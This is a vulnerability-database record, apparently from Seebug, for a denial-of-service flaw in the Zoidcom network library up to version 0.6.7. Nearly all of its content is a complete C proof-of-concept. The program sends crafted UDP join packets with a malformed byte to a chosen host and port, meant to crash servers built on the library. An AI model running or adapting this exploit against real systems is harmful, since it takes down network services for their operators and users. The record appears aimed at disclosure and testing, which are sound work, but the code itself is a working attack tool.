Description
No description provided by source.
{"lastseen": "2017-11-19T16:07:08", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 7.1}, "href": "https://www.seebug.org/vuldb/ssvid-83880", "references": [], "enchantments_done": [], "id": "SSV:83880", "title": "Zoidcom 0.6.x Malformed Packet Denial of Service Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 5, "sourceData": "\n source: http://www.securityfocus.com/bid/25326/info\r\n\r\nThe Zoidcom network library is prone to a denial of service vulnerability when handling malformed packets.\r\n\r\nAn attacker could exploit this to crash a network service that is implemented with the library. \r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <ctype.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include "winerr.h"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n #define stristr strcasestr\r\n#endif\r\n\r\n\r\n\r\n#define VER "0.1"\r\n#define PORT 8899\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n i;\r\n u16 port = PORT;\r\n u8 buff[16];\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs("\\n"\r\n "Zoidcom <= 0.6.7 crash "VER"\\n"\r\n "by Luigi Auriemma\\n"\r\n "e-mail: aluigi@autistici.org\\n"\r\n "web: aluigi.org\\n"\r\n "\\n", stdout);\r\n\r\n if(argc < 2) {\r\n printf("\\n"\r\n "Usage: %s <host> [port(%hu)]\\n"\r\n\t "\\n", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n if(argc > 2) port = atoi(argv[2]);\r\n peer.sin_addr.s_addr = resolv(argv[1]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf("- target %s : %hu\\n",\r\n\t inet_ntoa(peer.sin_addr), port);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n // the following is a classical join packet\r\n memcpy(buff,\r\n\t "\\xec\\x03\\x00\\x00\\x00\\x68\\xc0\\xff\\xe9\\x00\\x80\\x07\\x00\\x64\\x00\\x01", 16);\r\n\r\n buff[8] = 0x69;\r\n printf("- send malicious packet 0x%02x\\n", buff[8]);\r\n for(i = 0; i < 2; i++) {\r\n if(sendto(sd, buff, 16, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n sleep(0);\r\n }\r\n\r\n sleep(ONESEC);\r\n\r\n buff[8] = 0xa9;\r\n printf("- send malicious packet 0x%02x\\n", buff[8]);\r\n for(i = 0; i < 2; i++) {\r\n if(sendto(sd, buff, 16, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n sleep(0);\r\n }\r\n\r\n close(sd);\r\n\r\n printf("- the server should have been crashed, check it\r\n manually\\n");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf("\\nError: Unable to resolv hostname (%s)\\n", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\nvoid std_err(void) {\r\n perror("\\nError");\r\n exit(1);\r\n}\r\n#endif\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-83880", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645285664, "score": 1683911323, "epss": 1678850553}, "_internal": {"score_hash": "01ab8a38f9ebe4d5c77780622b1189ce"}}
{}